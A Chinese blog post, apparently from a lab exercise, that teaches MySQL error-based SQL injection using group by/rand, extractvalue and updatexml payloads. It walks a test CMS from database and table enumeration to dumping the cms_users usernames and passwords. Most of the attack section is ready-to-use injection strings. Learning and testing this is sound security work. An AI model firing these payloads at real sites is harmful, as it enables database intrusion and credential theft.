SQL 注入——报错注入

最新推荐文章于 2024-06-13 21:16:20 发布
最新推荐文章于 2024-06-13 21:16:20 发布
阅读量63 收藏
点赞数 1
分类专栏: # SQL注入 文章标签: 数据库 网络安全 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134252916
版权

报错注入

在注入点的判断过程中,发现数据库中 SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。

报错注入的原理,就是在错误信息中执行 SQL 语句。

group by

?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from
information_schema.tables group by x)a)

?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit
0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

extractvalue

?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))

?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))

updatexml

显示长度有限制,可以拆分查询

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)

在这里插入图片描述

当 sql 语句出现闭合时,显示报错信息

在这里插入图片描述

在报错信息后加报错查询

and updatexml(1,concat(0x5e,(select database()),0x5e),1)

image-20231106171116197

爆破账号密码

查看当前数据库

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e)) --+

image-20231106183739392

查看当前数据库中的表

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database()),0x5e)) --+

报错返回多于一行

image-20231106184216182

加限制条件,一次查询一条,从 limit 1,1 开始,直到查到 limit 7,1 出现 cms_users 表可能存在用户信息

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 7,1),0x5e)) --+

image-20231106185713272

查看表中字段

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 1,1),0x5e)) --+

image-20231106190158545

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 2,1),0x5e)) --+

image-20231106190235156

查询用户名和密码

http://10.9.47.148/cms/show.php?id=33 and extractvalue(1,concat(0x5e,(select group_concat(username,':',password) from cms_users),0x5e)) --+

image-20231106190550015

解密

image-20231106190625429

gjl_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入攻击流量情况
07-18
sql注入攻击流量情况
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
SQL 注入天书.pdf
08-06
SQL 注入学习天书
【Qt实现录频】
m0_45463480的博客
06-13 131
请注意,这只是一个简单的示例代码,实际应用中你可能需要处理更多的细节,如捕获不同视频格式、处理录制过程中的错误等。希望这个示例对你有所帮助,另外你也可以在Qt官方文档中找到更多关于Qt Multimedia模块的详细信息。在Qt中实现录制视频可以通过使用Qt Multimedia模块来实现。在上面的示例中,VideoRecorder类提供了一个简单的界面,其中包括一个用于录制视频的按钮。当按钮被点击时,toggleRecord()槽函数将会启动或停止录制。
canal应用
qq_33816292的博客
06-12 102
canal分享模块链接。
mysql中 redo日志(下)
qq_41534540的博客
06-08 686
大家好。上篇文章我们介绍了什么是redo日志以及redo日志的写入过程。建议没看过上篇文章的同学先看一下《mysql那些事儿》之 redo日志(上),今天我们继续来说一说redo日志。
PostgreSQL:在CASE WHEN语句中使用SELECT语句
sig321的专栏
06-07 493
CASE WHEN语句是一种条件语句,用于多条件查询,相当。它允许我们根据不同的条件执行不同的操作。你甚至能在。而在一些情况下,我们可能需要在CASE WHEN语句中使用SELECT语句来检索数据或计算结果。下面是一些示例和说明,帮助我们更好地理解如何在PostgreSQL中实现这个目标。
SpringBoot+MyBatis批量插入数据的三种方式
pscool的博客
06-12 816
在开发过程中,我们经常会遇到往数据库表中插入大量数据的场景,比如excel批量导入数据。那么该如何快速地插入数据呢?我们可以考虑使用批量插入来实现,实测100000条数据添加,后附具体实现代码。用一个 for 循环,把数据一条一条地插入。/*** 第一种方案,用 for语句循环插入 10万 条数据*/i < count;i++) {user.setName("方案1测试" + i);user.setGender("男");user.setUsername("方案1测试");
MySQL数据库基础】
2301_76249062的博客
06-07 966
数据库基础操作,带你创建系统学习数据库表的增删查找,数据库内容不断更新!!!
liquibase做数据库版本管理
weixin_44554979的博客
06-10 202
通过这个配置就会自动启动liquibase。
java:使用JSqlParser给sql语句增加tenant_id和deleted条件
陈鸿圳的专栏
06-11 395
【pom.xml】
springboot连接多个库
sunyingboaini的博客
06-11 170
一个SpringBoot项目,同时连接两个数据库:比如一个是Mysql数据库,一个是oracle数据库(啥数据库都一样,连接两个同为oracle的数据库,或两个不同的数据库,只需要更改对应的driver-class-name和jdbc-url等即可)注意:连接什么数据库,要引入对应数据库的包。
RAG:如何从0到1搭建一个RAG应用
Miao的博客
06-10 828
检索增强生成)是一种强大的工具,整合了从庞大知识库中检索到的相关信息,并以此为基础,指导大型语言模型生成更为精准的答案,从而显著提升了回答的准确性与深度。2020 年,Meta AI 研究人员提出了RAG的方法,用于提高 LLM 在特定任务上的性能。信息滞后:LLM 的知识是静态的,来源于当时训练时的数据,也就是 LLM 无法直接提供最新的信息。模型幻觉:实践表明,当前的生成式 AI 技术存在一定的幻觉,而在一些常见的业务应用中,我们是希望保证事实性的。私有数据匮乏。
嵌入式学习记录6.13(qt day1)
最新发布
weixin_53529699的博客
06-13 150
【代码】嵌入式学习记录6.13(qt day1)
浅解Reids持久化
weixin_64260010的博客
06-10 345
rdb文件都是二进制,很小,里面存的是数据。
数据库课设-中小企业工资管理系统
Fightever_的博客
06-13 167
【代码】数据库课设-中小企业工资管理系统。
数据库select语句基础
u014516208的博客
06-12 322
列出id,name.english列,并指定显示name=li04的行。模糊匹配 like ‘%’ ‘_’去除重复行 distinct。返回值为1 --表示为真。返回值为0 --表示为假。合并列: concat。精确定位 = < >聚合group by。
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值